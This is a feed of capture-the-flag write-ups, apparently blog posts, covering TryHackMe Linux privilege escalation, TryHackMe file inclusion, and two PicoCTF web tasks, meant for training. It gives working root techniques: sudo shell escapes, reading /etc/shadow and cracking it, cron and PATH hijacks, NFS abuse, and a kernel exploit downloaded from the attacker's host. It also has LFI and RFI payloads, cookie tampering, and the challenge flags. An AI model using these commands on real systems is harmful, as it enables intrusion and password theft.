DEV Community: Riviru Eren

TryHackMe — Linux Privilege Escalation Writeup

Riviru Eren — Wed, 08 Apr 2026 12:18:25 +0000

Difficulty: Medium | Path: Jr. Penetration Tester

What is Privilege Escalation?

Privilege escalation is when you go from a low level user on a system to a higher level one, usually root. In real pentesting you almost never land on a machine as root straight away. You get in as some low privilege user and then you have to find a way to get root access. That's where privesc comes in.

There are two types you need to know:

Horizontal means you move sideways to another user who has the same level of access as you. This can be useful to grab files or SUID binaries that belong to that user.

Vertical is what most people think of when they hear privilege escalation. You go from a normal user up to root or admin.

Step 1: Enumerate Everything First

Before you try anything, you need to know what you're working with. These are the commands I run first thing every time:

hostname
uname -a
cat /proc/version
cat /etc/issue
ps aux
env
sudo -l
ls -la /etc/cron*

The uname -a output is really important because it gives you the kernel version. An outdated kernel could mean there's a public exploit available for it. The sudo -l command shows you what the current user is allowed to run as sudo, which is often where the easiest wins are.

Technique 1: Kernel Exploits

If the kernel is old enough, there's probably a public exploit for it that can take you straight to root.

uname -a
searchsploit linux kernel 4.x.x   # replace with actual version

Once you find a relevant exploit, host it from your machine and pull it onto the target:

# On your machine
python3 -m http.server 8000

# On the target
wget http://YOUR_IP:8000/exploit.c
gcc exploit.c -o exploit
./exploit
id

If you see uid=0(root) after running id then you're done.

Technique 2: Sudo Misconfigurations

This is one of the first things I check. Run sudo -l and see what comes up. If any binary is listed there, go to GTFOBins (https://gtfobins.github.io) and look it up. There's almost always a way to abuse it.

Some quick examples:

# find
sudo find . -exec /bin/sh \; -quit

# vim
sudo vim -c '!sh'

# awk
sudo awk 'BEGIN {system("/bin/sh")}'

# nmap (older versions)
echo "os.execute('/bin/sh')" > shell.nse
sudo nmap --script=shell.nse

Any of these will get you a root shell if that binary shows up in your sudo -l output.

Technique 3: SUID Files

SUID files run with the permissions of whoever owns them rather than whoever is running them. So if root owns a binary and it has the SUID bit set, it runs as root regardless of who executes it.

Find them with:

find / -type f -perm -04000 -ls 2>/dev/null

Then take that list to GTFOBins and check each one. Common ones that are abusable include base64, find, python, and cp.

For example if base64 has SUID set, you can read any file on the system:

base64 /etc/shadow | base64 --decode

That lets you grab the shadow file which has the password hashes.

Technique 4: Cracking Passwords with John the Ripper

Once you have the shadow file, you can crack the hashes offline.

# Get the files
base64 /etc/passwd | base64 --decode > passwd.txt
base64 /etc/shadow | base64 --decode > shadow.txt

# Combine them
unshadow passwd.txt shadow.txt > passwords.txt

# Crack
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

If any user has a weak password John will find it fast. You can then su into that account or use the password to SSH in.

Technique 5: Cron Job Exploitation

Cron jobs are scheduled tasks that run automatically at set times. The interesting ones are cron jobs that run as root but execute a script that you as a low privilege user can write to.

Check what's scheduled:

cat /etc/crontab
ls -la /etc/cron*

If you find something like this running as root:

* * * * * root /opt/backup.sh

And you can write to /opt/backup.sh, just add a line to it:

echo 'chmod +s /bin/bash' >> /opt/backup.sh

Wait for the cron to run, then:

bash -p
id

Root shell.

Technique 6: PATH Hijacking

If a SUID binary calls another program without using the full path (so it calls ls instead of /bin/ls), you can trick it into running your own version instead.

# Create a malicious binary in /tmp
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls

# Prepend /tmp to PATH
export PATH=/tmp:$PATH

# Run the SUID binary
./vulnerable_binary

Since your /tmp is checked first in PATH, it runs your fake ls instead, which gives you a shell as root.

Technique 7: NFS Shares

Check if there are any NFS shares with no_root_squash set:

cat /etc/exports

no_root_squash means root on your attacking machine is treated as root on the target too. So you can mount the share, put a SUID binary on it, and run it on the target for a root shell.

# On your attacking machine
showmount -e TARGET_IP
mkdir /tmp/mount
mount -t nfs TARGET_IP:/share /tmp/mount

# Create SUID binary
cp /bin/bash /tmp/mount/bash
chmod +s /tmp/mount/bash

# On the target
/share/bash -p
id

Tools Worth Knowing

LinEnum.sh does automated enumeration and saves a lot of time. Download it from GitHub and run it on the target to get a full picture of what's exploitable.

GTFOBins is essential. Any time you find a binary you can abuse, this site tells you exactly how.

John the Ripper is your go-to for cracking hashes once you have them.

searchsploit lets you search the local exploit database without needing internet on the target.

Final Thoughts

The biggest lesson from this room is that privilege escalation is about patience and thoroughness. You run your enumeration commands, you go through the output carefully, and eventually something sticks out. It's rarely glamorous but it's one of the most important skills you can have as a pentester.

If you haven't done this room yet, go do it. It covers everything you need for CTFs and is basically required knowledge for OSCP.

Room link: https://tryhackme.com/room/linprivesc

Try Hack Me — File Inclusion

Riviru Eren — Wed, 08 Apr 2026 11:52:17 +0000

Why do file inclusion vulnerabilities happen?

File inclusion bugs usually come from bad input validation. Web apps (often in languages like PHP) take a filename from user input and use it directly to open or include a file. If the app doesn’t check or sanitize that input, an attacker can control which file gets loaded — and that leads to the vulnerability.

Key causes

User-supplied filenames or paths are used directly.
No allowlist of allowed files or extensions.
Dangerous server settings (e.g., remote file includes enabled).
Poor error handling that helps attackers probe the app.

What’s the risk?

If exploited, file inclusion can let an attacker:

Leak sensitive files (source code, config files, credentials).
Read system files (/etc/passwd, logs, etc.).
Combine with other bugs (like an upload flaw) to achieve remote code execution (RCE).
Escalate access if the web process can read secrets used elsewhere.

Because these vulnerabilities expose server-side data and can lead to full compromise, they’re high-risk and should be fixed immediately.

Challenges

Firstly visit the given link and reach the desired website.

Path Traversal is skipped here as the answer can be found easily by reading the content given at THM.

Local File Inclusion — LFI

Lab 1

Upon reaching the Lab 1 page we are met with a form that can be used to give an input. Lets try by passing etc/passwd through it.

We are given back a response with errors. These errors reveal some crucial details. include(etc/passwd) shows that the whole input is passed through without any filtering or sanitation. And the error also reveals the web directory as var/www/html/lab1.php.

So if we pass the value ../../../../etc/passwd we should get back the passwd file content.

../../../../etc/passwd

The flag for the question asks what the request URI would be for etc/passwd.

So press inspect -> Network and again pass etc/passwd through the form and watch for the first entry containing the request made.

You can see the answer for Q1 under the file categeory of the first entry.

/lab1.php?file=/etc/passwd

Lab 2

Go back to home and press on Lab 2

In this lab we are given that the developer has decided to specify the directory within the function as

<?PHP   
 include("languages/". $_GET['lang']);   
?>

When we try to pass etc/passwd through this lab we get an error as follows.

We can see that the request has been changed to (includes/etc/passwd) so the answer for Q2 is the word “includes” as it is the directory specified by the developer as we can see by it being added infront of the path we entered.

Lab 3

Quick Summary :-

When you don’t have the source code (black-box testing), error messages are gold. They often show how the app builds file paths and where files live.

Example entry point:

http://webapp.thm/index.php?lang=EN

If you send a bogus value like THM, the app returns:

Warning: include(languages/THM.php): failed to open stream: No such file or directory in /var/www/html/THM-4/index.php on line 12

This error reveals three useful things:

The app calls include(“languages/.php”).
Files live in a languages folder and end with .php.
The full server path is /var/www/html/THM-4/.

Knowing the app appends .php means a straight directory traversal like:

http://webapp.thm/index.php?lang=../../../../etc/passwd

fails, because the server tries to open languages/../../../../etc/passwd.php (which doesn’t exist).

Null byte trick (%00)

A classic bypass is the null byte (URL-encoded as %00), which terminates a string early in some C-based string handlers. If the app naively concatenates “.php” after your input, an input such as:

../../../../etc/passwd%00

can make the include evaluate as:

include(“languages/../../../../etc/passwd%00”).”.php”);

→ treated as include(“languages/../../../../etc/passwd”);

That lets you read /etc/passwd via the include.

Important note: the null-byte trick was patched — it does not work on PHP 5.3.4 and newer.

If we pass etc/passwd we are given an error.

The code appends .php to the end and the developer has also defined a directory hence our path is changed into an invalid path as

(includes/etc/passwd.php)

To solve this issue we can use the ../../ trick to go up in the directories and use the %00 trick to cancel the .php append.

So the path we should enter to retieve the content of the passwd file is the answer of Q3

/lab3.php?file=../../../../etc/passwd%00

Q4

Q : Which function is causing the directory traversal in Lab #4?

Ans = file_get_contents

Q5

Try out Lab #6 and check what is the directory that has to be in the input field?

Open Lab 5 and pass a value ( etc/passwd )

The response says only files in THM-profile folder is accessible. Hence

Ans = THM-profile

Q6

Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

We know that all the files should be from the THM-Profile directory hence our input should start with THM-Profile, and we can use the ../../ trick to go up in directories. Lets try this.

Using THM-profile/../../../../../../etc/os-release reveals the OS version as 12.04 which is the answer.

THM-profile/../../../../../../etc/os-release

Challenges

These challenges can be completed using burp suite but as it is covered in other writeups this writeup contains methods to complete the task without burpsuite.

Visit /challenges/index.php and select Challenge 1

Q1. Capture Flag1 at /etc/flag1

We are given a hint.

The input form is broken! You need to send POST request with file parameter!

Go to inspect and find the section related to the form, you can see that the form has been created with the method GET

Double click on GET and type POST in that space. Then without refreshing the brower go to the input form and type etc/flag1 and press include.

The flag will be visible.

F1x3d-iNpu7-f0rrn

Q2. Capture Flag2 at /etc/flag2

You might be asked to refresh the page. If so refresh.

The page says that only admins are allowed to view the site. Lets take a loot at the cookies to see if we can manipulate it.

Right Click -> Inspect -> Storage -> Cookies

We can see that the cookie has a value of Guest. We can try and edit this value. Lets try Admin.

Refresh the page.

We can see it worked. But the flag is nowehere to be seen.

We can see that the input is automatically appended to “includes/” so if we need to try and escape back to the parent directory we need to use the ../../ trick. And as .php is appended we also need to ad %00 to the end

Lets try the same thing again but this time with the path ../../../../../etc/flag2%00 as the value of the cookie.

../../../../../etc/flag2%00

We can retieve the flag.

c00k13_i5_yuMmy1

Q3. Capture flag at etc/flag3

You can follow the same steps and change the GET value to post and refresh the page and intercept the request from Burp and add the parameters and forward to get a response.

But as this method is widely covered and known to give issues to many beginners i will suggest a easier method using CURL.

curl -X POST <ip_adr>/challenges/chall3.php -d 'method=POST&file=../../../../etc/flag3%00' --output -

Answer

P0st_1s_w0rk1in9

Q4. Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

In order to gain to this we need to create a file containing the hostname command on our machine.

<?php echo exec("hostname");?>

We can do this by Nano in the terminal

nano test.txt

Type the PHP code , Press CTRL+O to save and Press Enter , Press CTRL+X to exit.

cat test.txt

Use cat and view the file content is correct.

Create a server on the same directory using the code ( include a port at the end if needed )

python3 -m http.server

Check the local IP address using ifconfig

In the playground website create a connection using http:///

Answer

lfi-vm-thm-f8c5b1a78692

PicoCTF Inspect HTML Writeup

Riviru Eren — Wed, 08 Apr 2026 11:46:21 +0000

PicoCTF Inspect HTML Writeup

SUPER SUPER EASY

Just Inspect the source code.

TADAAAAA and the flag shall be visible.

PicoCTF Cookies ( Web Exploitation )

Riviru Eren — Wed, 08 Apr 2026 11:46:20 +0000

PicoCTF Cookies 🍪 ( Web Exploitation )

Easy

This challenge focuses on the use and manipulation of web cookies.

Firsty click the link and access the webpage at http://mercury.picoctf.net:64944/

We can try entering a random cookie type to see if it generates a response.

Upon entering chocolate chip we get the following response.

Lets check the session cookies to see if we can gather some information.

Inspect -> Storage / Memory -> Cookies

We can see that the cookie has a value of 1, lets try adjusting the value to see if we gain a different response.

Adjusting the value as 2 gives us a new response with a new type of cookie.

Adjusting the value as 3 has the same output.

Lets try the cookie value as 30.

Using 30 as the value for the cookie gives us an error hinting that the valid numbers of cookies lie between 1 and somewhere below 30.

Trying 29 yeilds no result , trying 28 gives a response. Hence the flag lies somewhere between cookie value 1 and 28.

Cookie 18 contains the required flag.